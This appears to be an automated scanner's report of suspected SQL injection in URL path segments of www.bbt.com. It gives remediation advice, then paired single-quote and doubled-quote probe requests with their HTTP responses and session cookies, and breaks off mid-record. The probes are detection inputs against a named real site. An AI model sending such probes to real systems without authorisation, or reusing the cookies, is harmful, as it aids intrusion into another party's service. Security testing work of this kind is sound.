SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:43 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296740587220; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 13:48:43 GMT location: http://www.bbt.com/bbt/%27%27/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 129 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/Business/Products/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:34 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/Business/Products/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:35 GMT location: http://www.bbt.com/bbt/%27%27/Business/Products/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 147 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/Business/Products/">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/Business'/Products/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:44 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/Business''/Products/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:45 GMT location: http://www.bbt.com/bbt/Business%27%27/Products/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 146 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Business%27%27/Products/">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/Business/Products'/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:13:22 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/Business/Products''/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:13:22 GMT location: http://www.bbt.com/bbt/Business/Products%27%27/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 146 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Business/Products%27%27/">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/Financial-Education/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:12 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/Financial-Education/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:13 GMT location: http://www.bbt.com/bbt/%27%27/Financial-Education/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 161 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/Financial-Education/default.html">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/Financial-Education'/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:35 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/Financial-Education''/default.html HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:35 GMT location: http://www.bbt.com/bbt/Financial-Education%27%27/default.html p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 160 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Financial-Education%27%27/default.html">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/Financial-Education/default.html' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:44 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/Financial-Education/default.html'' HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:45 GMT location: http://www.bbt.com/bbt/Financial-Education/default.html%27%27 p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 160 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Financial-Education/default.html%27%27">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/Personal/Products/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:03 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt''/Personal/Products/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:03 GMT location: http://www.bbt.com/bbt/%27%27/Personal/Products/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 147 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/%27%27/Personal/Products/">here</a>.</body>
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/Personal'/Products/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:29 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/Personal''/Products/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:30 GMT location: http://www.bbt.com/bbt/Personal%27%27/Products/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 146 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Personal%27%27/Products/">here</a>.</body>
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt/Personal/Products'/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
HTTP/1.1 404 - Not Found connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:43 GMT p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 15405 cache-control: private x-powered-by: ASP.NET
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta name="DCS.dcsuri" content="/404error"/> ...[SNIP]...
Request 2
GET /bbt/Personal/Products''/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 2
HTTP/1.1 302 Object moved connection: close content-type: text/html date: Thu, 03 Feb 2011 14:12:43 GMT location: http://www.bbt.com/bbt/Personal/Products%27%27/ p3p: CP="NON UNI CUR OTPi OUR NOR" x-old-content-length: 146 cache-control: private x-powered-by: ASP.NET
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/bbt/Personal/Products%27%27/">here</a>.</body>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /bbt'/about/ HTTP/1.1 Host: www.bbt.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CampIDMaj=AGM; PD_STATEFUL_ffe1e09c-8b8e-11da-90bc-00f8d800e002=%2Fbbt; 2489482-VID=16101423669632; HumanClickSiteContainerID_2489482=STANDALONE; 2489482-SKEY=2662170475251338767; s_sq=%5B%5BB%5D%5D; AMWEBJCT!%2Fbbt!ASPSESSIONIDCSRTAAAC=ABCGOOCAHNCLNCBLOOHFONCO; s_campaign=1635; s_cc=true; ReferralSource=AE; s_nr=1296742046071; s_vi=[CS]v1|26A558538515821A-6000018040007074[CE]; bbt=52f3b26952f3b2fdbaeebafd; CampIDMin=AR;
Response 1
